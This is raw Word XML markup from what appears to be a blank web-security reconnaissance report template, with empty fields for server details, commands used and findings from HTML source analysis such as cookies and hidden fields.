            <w:r w:rsidRPr="00D62B99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5C0E7886" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85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B7D85" w:rsidRPr="00D62B99" w14:paraId="2E446FFF" w14:textId="77777777" w:rsidTr="008269B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9CC520D" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="008269B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62B99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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E74B4B0" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85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B7D85" w:rsidRPr="00D62B99" w14:paraId="5CCDD0A5" w14:textId="77777777" w:rsidTr="008269B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2895BFC" w14:textId="2D8E5636" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="008269B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41475">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
            <w:r w:rsidR="0079565C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Revealed </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9A9DED" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRDefault="007B7D85" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58A95C98" w14:textId="43460AEC" w:rsidR="007B7D85" w:rsidRPr="00894386" w:rsidRDefault="00C263D5" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00C263D5">
              <w:t>latform</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Details</w:t>
            </w:r>
            <w:r w:rsidR="007B7D85">
              <w:t>: _____________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="745228B4" w14:textId="342561DF" w:rsidR="007B7D85" w:rsidRPr="00894386" w:rsidRDefault="00581438" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00581438">
              <w:t>CMS</w:t>
            </w:r>
            <w:r w:rsidR="007B7D85">
              <w:t>: _____________________________________</w:t>
            </w:r>
            <w:r w:rsidR="008A4FF1">
              <w:t>_________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF07A67" w14:textId="5A77B8F8" w:rsidR="007B7D85" w:rsidRPr="00894386" w:rsidRDefault="008A4FF1" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="008A4FF1">
              <w:t xml:space="preserve">cripting </w:t>
            </w:r>
            <w:r>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidRPr="008A4FF1">
              <w:t>echnologies</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Used</w:t>
            </w:r>
            <w:r w:rsidR="007B7D85">
              <w:t>: ___________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A948262" w14:textId="3A47DE98" w:rsidR="007B7D85" w:rsidRDefault="00FF3DB7" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00FF3DB7">
              <w:t>Web Server Software</w:t>
            </w:r>
            <w:r w:rsidR="007B7D85">
              <w:t>: ______________________________</w:t>
            </w:r>
            <w:r>
              <w:t>__</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46E8FE21" w14:textId="173D878E" w:rsidR="00183FD2" w:rsidRDefault="00183FD2" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00183FD2">
              <w:t>IP address</w:t>
            </w:r>
            <w:r>
              <w:t>: _________________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5AAF95" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRDefault="007B7D85" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:bCs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Calibri" w:cs="Calibri"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Others (If any): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="280ED9FF" w14:textId="77777777" w:rsidR="00183FD2" w:rsidRPr="00D62B99" w:rsidRDefault="00183FD2" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="100" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:bCs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357B5F" w:rsidRPr="00D62B99" w14:paraId="3F199B6D" w14:textId="77777777" w:rsidTr="008269B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350D2A8" w14:textId="6A248536" w:rsidR="00357B5F" w:rsidRPr="00541475" w:rsidRDefault="00307879" w:rsidP="008269B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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1870F0BE" w14:textId="77777777" w:rsidR="00357B5F" w:rsidRDefault="00357B5F" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EAE4854" w14:textId="77777777" w:rsidR="00307879" w:rsidRDefault="00307879" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D54DF" w:rsidRPr="00D62B99" w14:paraId="69C3B590" w14:textId="77777777" w:rsidTr="008269B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C400175" w14:textId="62F89CA0" w:rsidR="002D54DF" w:rsidRDefault="002D54DF" w:rsidP="008269B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Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="136296FC" w14:textId="77777777" w:rsidR="002D54DF" w:rsidRDefault="002D54DF" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64190586" w14:textId="77777777" w:rsidR="002D54DF" w:rsidRDefault="002D54DF" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E84DA9F" w14:textId="77777777" w:rsidR="002D54DF" w:rsidRDefault="002D54DF" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B7D85" w:rsidRPr="00D62B99" w14:paraId="170DC2C6" w14:textId="77777777" w:rsidTr="008269B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F345953" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="008269B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62B99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665389A3" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="0084356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DD40CCE" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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AFC0577" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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16A7CC5" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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D4189E7" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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65431F7" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85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27FC6" w:rsidRPr="00D62B99" w14:paraId="6B45A9FF" w14:textId="77777777" w:rsidTr="008269B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E20043F" w14:textId="42425F97" w:rsidR="00C27FC6" w:rsidRDefault="00C27FC6" w:rsidP="008269B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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used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(If any)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="075A03FE" w14:textId="77777777" w:rsidR="00C27FC6" w:rsidRPr="0004313F" w:rsidRDefault="00C27FC6" w:rsidP="00C27FC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04313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Gemini, Copilot, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2357DC79" w14:textId="77777777" w:rsidR="00C27FC6" w:rsidRDefault="00C27FC6" w:rsidP="00C27FC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D4FD907" w14:textId="77777777" w:rsidR="00C27FC6" w:rsidRDefault="00C27FC6" w:rsidP="00C27FC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27FC6" w:rsidRPr="00D62B99" w14:paraId="0A067B9B" w14:textId="77777777" w:rsidTr="008269B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1E5B604" w14:textId="35C0A88D" w:rsidR="00C27FC6" w:rsidRPr="00357473" w:rsidRDefault="00C27FC6" w:rsidP="008269B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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0EE863" w14:textId="77777777" w:rsidR="00C27FC6" w:rsidRDefault="00C27FC6" w:rsidP="00C27FC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5F5FC86" w14:textId="77777777" w:rsidR="00C27FC6" w:rsidRDefault="00C27FC6" w:rsidP="00C27FC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4847EF0" w14:textId="77777777" w:rsidR="00C27FC6" w:rsidRPr="0004313F" w:rsidRDefault="00C27FC6" w:rsidP="00C27FC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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C27FC6" w:rsidRPr="00D62B99" w14:paraId="513C1DD2" w14:textId="77777777" w:rsidTr="008269B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425BF67" w14:textId="0A50E519" w:rsidR="00C27FC6" w:rsidRPr="00357473" w:rsidRDefault="00C27FC6" w:rsidP="008269B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072C8021" w14:textId="77777777" w:rsidR="00C27FC6" w:rsidRDefault="00C27FC6" w:rsidP="00C27FC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49204BED" w14:textId="414D3CCF" w:rsidR="00AF2A67" w:rsidRDefault="00AF2A67" w:rsidP="00AF2A67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lastRenderedPageBreak/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E549B" w14:paraId="0D848003" w14:textId="77777777" w:rsidTr="000E549B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="196CFF09" w14:textId="77777777" w:rsidR="000E549B" w:rsidRDefault="000E549B" w:rsidP="00AF2A67">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="380D9F97" w14:textId="77777777" w:rsidR="000E549B" w:rsidRDefault="000E549B" w:rsidP="00AF2A67">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B7B3B82" w14:textId="77777777" w:rsidR="000E549B" w:rsidRDefault="000E549B" w:rsidP="00AF2A67">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A0C6043" w14:textId="77777777" w:rsidR="000E549B" w:rsidRDefault="000E549B" w:rsidP="00AF2A67">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42F0088A" w14:textId="77777777" w:rsidR="000E549B" w:rsidRDefault="000E549B" w:rsidP="00AF2A67">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A0778F2" w14:textId="77777777" w:rsidR="0054343C" w:rsidRPr="00A51A96" w:rsidRDefault="0054343C" w:rsidP="00AF2A67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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B92EE4" w:rsidRPr="00A51A96" w14:paraId="740B2EA8" w14:textId="77777777" w:rsidTr="007A16D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0EA53C69" w14:textId="1DA8F13E" w:rsidR="00B92EE4" w:rsidRPr="006701F2" w:rsidRDefault="00B92EE4" w:rsidP="0054343C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  <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test 1.4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205EDB" w:rsidRPr="00205EDB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Analyze the HTML Source Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A07AFD1" w14:textId="77777777" w:rsidR="00AF2A67" w:rsidRPr="00F13E8D" w:rsidRDefault="00AF2A67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3D3144" w:rsidRPr="003D3144" w14:paraId="0AFB1DB1" w14:textId="77777777" w:rsidTr="009C752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612EE55" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="009C752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D3144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1F4DE947" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="003D31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D3144" w:rsidRPr="003D3144" w14:paraId="09FCCB63" w14:textId="77777777" w:rsidTr="009C752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EAEBB0F" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="009C752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D3144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704B0B48" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="003D31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D3144" w:rsidRPr="003D3144" w14:paraId="01DA53A8" w14:textId="77777777" w:rsidTr="009C752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2133CC1" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="009C752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D3144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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="770E7CE5" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="003D31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D3144" w:rsidRPr="003D3144" w14:paraId="3A61AA85" w14:textId="77777777" w:rsidTr="009C752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FC80E40" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="009C752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D3144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Important Links and Image Tags in HTML </w:t>
            </w:r>
            <w:r w:rsidRPr="003D3144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Source Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D78C43" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567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02CBD1B" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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F5F9BAE" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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1E4718D" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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3E4F422" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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17681E4" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="003D31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D3144" w:rsidRPr="003D3144" w14:paraId="7CA672EA" w14:textId="77777777" w:rsidTr="009C7520">
        <w:trPr>
          <w:trHeight w:val="1133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FD78DFA" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="009C752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D3144">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Contact Details of Admin/Developer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6E9713" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="003D31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D3144" w:rsidRPr="003D3144" w14:paraId="66F816E9" w14:textId="77777777" w:rsidTr="009C752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F089367" w14:textId="425FC8EE" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="009C752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D3144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Websites or Web Servers it Establishes </w:t>
            </w:r>
            <w:r w:rsidR="004A6E1D" w:rsidRPr="003D3144">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Connections</w:t>
            </w:r>
            <w:r w:rsidRPr="003D3144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with</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670BCB87" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567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A8BF693" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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67F3AE4" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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A0346B3" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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ABBFCE5" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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8E1BC0D" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="003D31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77972" w:rsidRPr="003D3144" w14:paraId="625751F3" w14:textId="77777777" w:rsidTr="009C752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693E0D4" w14:textId="5B1C1BFD" w:rsidR="00B77972" w:rsidRPr="003D3144" w:rsidRDefault="00B77972" w:rsidP="009C752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F1344">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>External Resources Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="606A9D03" w14:textId="77777777" w:rsidR="00B77972" w:rsidRDefault="00B77972" w:rsidP="00B7797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B41F0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[*Scripts, APIs, external libraries, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75166FB4" w14:textId="77777777" w:rsidR="00B77972" w:rsidRDefault="00B77972" w:rsidP="00B7797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8C830A4" w14:textId="77777777" w:rsidR="00B77972" w:rsidRDefault="00B77972" w:rsidP="00B7797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2250C59" w14:textId="77777777" w:rsidR="00B77972" w:rsidRPr="003D3144" w:rsidRDefault="00B77972" w:rsidP="00B7797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77972" w:rsidRPr="003D3144" w14:paraId="4829B8B8" w14:textId="77777777" w:rsidTr="0037292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1565B91" w14:textId="53A01108" w:rsidR="00B77972" w:rsidRPr="006F1344" w:rsidRDefault="004D341F" w:rsidP="0037292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D341F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Cookies and Security Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69038C49" w14:textId="66F0E6AC" w:rsidR="00B77972" w:rsidRPr="00B41F0B" w:rsidRDefault="004D341F" w:rsidP="00B7797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4D341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HttpOnly, Secure, SameSite,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237D67" w:rsidRPr="003D3144" w14:paraId="4774C845" w14:textId="77777777" w:rsidTr="0037292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55B9398" w14:textId="4B5E1CCF" w:rsidR="00237D67" w:rsidRPr="004D341F" w:rsidRDefault="00237D67" w:rsidP="0037292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37D67">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Hidden Fields &amp; Exposed Sensitive Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7539DA33" w14:textId="6BDFB65E" w:rsidR="00237D67" w:rsidRDefault="00352A41" w:rsidP="00B7797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352A4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Tokens, authentication parameters,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3D3144" w:rsidRPr="003D3144" w14:paraId="407C6335" w14:textId="77777777" w:rsidTr="00372923">
        <w:trPr>
          <w:trHeight w:val="17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AEFCA25" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="0037292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D3144">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Other Information obtained through HTML Source Code Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21900AEB" w14:textId="77777777" w:rsidR="003D3144" w:rsidRDefault="004E3CA2" w:rsidP="003D31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B4C9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[*Input Field Validation, </w:t>
            </w:r>
            <w:r w:rsidR="003B4C96" w:rsidRPr="003B4C9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Debugging Code or Comments Identified,</w:t>
            </w:r>
            <w:r w:rsidR="003B4C96" w:rsidRPr="003B4C96">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003B4C96" w:rsidRPr="003B4C9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Deprecated or Insecure HTML Elements, robots Meta Tag Observations, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="003B4C9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382A7B2" w14:textId="77777777" w:rsidR="003B4C96" w:rsidRDefault="003B4C96" w:rsidP="003D31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8BB36F4" w14:textId="77777777" w:rsidR="003B4C96" w:rsidRDefault="003B4C96" w:rsidP="003D31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F1737EF" w14:textId="77777777" w:rsidR="003B4C96" w:rsidRDefault="003B4C96" w:rsidP="003D31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72527A0" w14:textId="77777777" w:rsidR="003B4C96" w:rsidRDefault="003B4C96" w:rsidP="003D31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C2AC960" w14:textId="03D25932" w:rsidR="003B4C96" w:rsidRPr="003D3144" w:rsidRDefault="003B4C96" w:rsidP="003D31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A33037" w:rsidRPr="003D3144" w14:paraId="7C7F4026" w14:textId="77777777" w:rsidTr="00372923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C1B8660" w14:textId="334D924D" w:rsidR="00A33037" w:rsidRPr="003D3144" w:rsidRDefault="00A33037" w:rsidP="0037292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33037">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06FEEAB8" w14:textId="77777777" w:rsidR="00A33037" w:rsidRPr="003B4C96" w:rsidRDefault="00A33037" w:rsidP="003D31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A33037" w:rsidRPr="003D3144" w14:paraId="3F6A667F" w14:textId="77777777" w:rsidTr="00372923">
        <w:trPr>
          <w:trHeight w:val="8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A97BE3B" w14:textId="44EDC4DD" w:rsidR="00A33037" w:rsidRPr="00A33037" w:rsidRDefault="0057337F" w:rsidP="0037292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7337F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
